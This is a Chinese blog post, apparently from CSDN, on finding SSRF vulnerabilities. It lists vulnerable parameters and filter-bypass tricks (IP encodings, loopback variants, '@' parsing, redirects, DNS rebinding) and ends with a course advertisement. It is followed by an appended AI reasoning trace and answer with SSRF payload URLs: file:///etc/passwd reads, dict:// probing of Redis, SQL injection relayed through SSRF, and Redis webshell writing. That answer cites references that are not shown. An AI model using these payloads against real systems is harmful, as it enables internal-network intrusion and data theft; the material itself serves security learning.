细谈SSRF漏洞挖掘思路总结!!!

0X01前言

SSRF(Server-Side Request Forgery,服务端请求伪造)漏洞通常是由于目标应用程序未正确验证用户输入数据,导致攻击者发送伪造的请求,绕过网络防御,获取敏感信息或利用其他漏洞进行进一步攻击。

**0X02常见的漏洞点
**

1.功能点

url解析与重定向``图片上传``文件上传``api调用``远程文件包含``导入\导出``网络测试功能

**2.参数点
**

URL``dest``redirect``uri``path``continue``window``next``data``reference``site``html``val``validate``domain``callback``return``page``feed``host``port``to``out``view``dir``show``navigation``IP``domain``webhook``link``image``redirect``calback``api_url``oembed_url``oembed_url``proxy``   

**0X03绕过方式
**

**1.IP****表示法
**

尝试使用不同的IP表示法(如十进制,八进制,十六进制等)绕过输入验证和过滤``127.0.0.1``127.0.0.1–>localhost``127.0.0.1–>7F000001       十六进制``127.0.0.1–>2130706433      十进制``http://192.168.0.1  >>>  http://3232235521/``127.0.0.1–>2130706433       Enclosed Alphanumerics``http://192.168.1.1  >>>  http://3232235777/

**2.域名解析
**

使用特殊的域名或子域名,如:localhost,127.0.0.1.xip.io等,来访问内部资源``localhost``xip.io``http://127。0。0。1` `http://0.0.0.0/``http://0/

**3.点分割符号
**

http://www。qq。com``http://www。qq。com``http://www.qq.com

**4.本地回传
**

http://127.0.0.1` `http://localhost` `http://127.255.255.254` `127.0.0.1 - 127.255.255.254` `http://[::1]` `http://[::ffff:7f00:1]` `http://[::ffff:127.0.0.1]` `http://127.1` `http://127.0.1` `http://0:80

**5.URL编码
**

尝试使用不同的URL编码方法,如字符编码,双重编码等,绕过输入验证和过滤``对请求得内部地址进行URL编码或者二次URL编码

**6.URL解析差易
**

利用web应用程序和底层服务器之间URL解析差易,如使用"@"字符,尖括号等特殊字符``如先进行正确得域名后面跟内网地址``http://xxx.xxx.xxx@127.0.0.1/XXX

**7.HTTP重定向
**

如果后端服务器在接收到参数后,正确的解析了URL的host,并且进行了过滤,这个时候可以尝试使用302跳转的方式来进行绕过``可通过在线生成短域名进行302跳转``利用HTTP重定向(如301,302跳转将请求从外部资源重定向到内部资源)``访问短网址会自动跳转到原来冗长的网址,利用短网址这个特性,我们可以绕过URL参数检测的黑名单``利用网址:https://www.urlc.cn/

**8.DNS重绑定
**

后端服务器通过DNS解析用户请求的URL参数获取IP地址,然后对返回的IP地址进行判断,如果在黑名单中,就pass掉。由于DNS解析和后续请求存在时间差,可以利用这个时间差进行DNS重绑定攻击。

**0X04案例
**

**1.访问内网资源
**

测试发现可以使用HTTP协议,因此可以通过HTTP访问内网资源。

在这里插入图片描述

在这里插入图片描述

2.伪协议读取文件

使用file伪协议进行文件读取

在这里插入图片描述

3.端口探测

在这里插入图片描述

**0X05绕过案例
**

1.利用绕过方法的6解析差易

http://xxx.xxx.xxx@127.0.0.1/XXX

在这里插入图片描述

2.利用绕过方法的7http重定向

使用以下网址生成一个短域名,进行跳转所访问的真正资源,中转的网站url则会绕过服务端的检测.

https://www.urlc.cn/

在这里插入图片描述

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

题外话

**
黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.youkuaiyun.com/logic1001/article/details/136247768

<think>好的,我现在需要帮助用户了解如何挖掘SSRF漏洞以及相关的扫描工具。首先,我应该回忆一下SSRF的基本概念,用户可能已经知道一些,但需要更深入的指导。 根据系统指令,我需要使用中文,并正确应用LaTeX格式。不过这个问题主要涉及网络安全,可能数学公式较少,但如果有变量或代码示例的话要注意格式。比如,提到的工具名称或命令可能需要用行内代码块。 接下来,查阅用户提供的引用资料。引用[1]提到SSRFire这个工具,可以用来扫描和发现SSRF漏洞。同时,其他引用中的例子,比如利用PHP脚本攻击内网服务,或者结合Redis未授权访问,说明SSRF的利用场景。这些可以作为挖掘方法的实例。 用户的问题分为两部分:挖掘方法和工具。我需要将回答分成这两个部分。对于挖掘方法,需要分步骤说明,比如参数测试、协议利用、绕过技巧等。工具部分则需要列出工具名称、功能及使用方法,比如SSRFire、Burp Suite等。 需要注意的是,用户可能对具体操作步骤不熟悉,因此要详细但不过于技术化。例如,在参数测试中,可以提到常见的URL参数如url、image、load等,并举例说明如何修改这些参数的值来测试响应。 另外,引用中的例子展示了如何利用SSRF漏洞攻击内网服务,比如通过注入SQL或者写入webshell。这些可以作为挖掘过程中的利用场景,说明在发现潜在漏洞后如何进一步验证。 关于工具部分,SSRFire需要满足一定的环境要求,比如Ruby环境,用户可能需要安装依赖库。Burp Suite的Collaborator功能可能对新手来说比较陌生,需要简单解释其作用,比如检测带外请求。 还要注意引用标识的正确添加,每个引用的地方在末尾自然标注,比如在提到SSRFire时添加[^1],在讨论内网攻击时引用[3]和[4]。 最后,生成相关问题需要考虑用户可能进一步想知道的内容,比如如何防御SSRF、常见漏洞案例、工具的比较等。确保问题覆盖漏洞挖掘的不同方面,帮助用户深入理解。</think>### SSRF漏洞挖掘方法与工具指南 #### 一、SSRF漏洞挖掘方法 1. **参数测试法** - 重点关注接收URL/路径的参数(如`url`、`image`、`load`),尝试修改其值为`http://127.0.0.1`、`file:///etc/passwd`或内网地址(如`http://192.168.1.1`)[^1][^2]。 - 观察响应是否包含目标服务器数据(如本地文件内容、内网服务报错信息)。 2. **协议利用法** - 测试支持的协议(如`dict://`、`gopher://`、`ftp://`),利用`dict://`探测内网端口状态: ```http http://example.com?url=dict://127.0.0.1:6379/info # 检测Redis服务 ``` 3. **绕过技巧** - 使用域名重定向(如短链接服务)、IPv6地址(`[::1]`)、进制编码绕过过滤规则[^4]。 4. **带外检测(OOB)** - 通过Burp Collaborator或DNSLog生成随机域名,观察服务器是否发起请求: ```http http://example.com?url=http://xxx.dnslog.cn ``` --- #### 二、常用SSRF扫描工具 1. **SSRFire** - **功能**:自动化参数探测、支持多协议测试、可结合XSS和SQLi等漏洞[^1]。 - **使用示例**: ```bash ruby ssrfize.rb -u "http://target.com?url=PAYLOAD" --payloads urls.txt ``` 2. **Burp Suite** - 通过`Intruder`模块批量测试参数,配合`Collaborator`监听带外请求。 3. **Gopherus** - 生成`gopher://`协议攻击载荷,针对Redis/MySQL等内网服务自动化攻击[^3]。 --- #### 三、实战场景示例 1. **内网Web应用攻击** - 通过SSRF注入SQL语句到内网CMS系统[^3]: ```http http://vuln.com/ssrf.php?url=http://127.0.0.1/cms/show.php?id=-33 UNION SELECT ... ``` 2. **Redis未授权利用** - 写入Webshell到可访问目录(如`/upload`),再通过SSRF触发[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值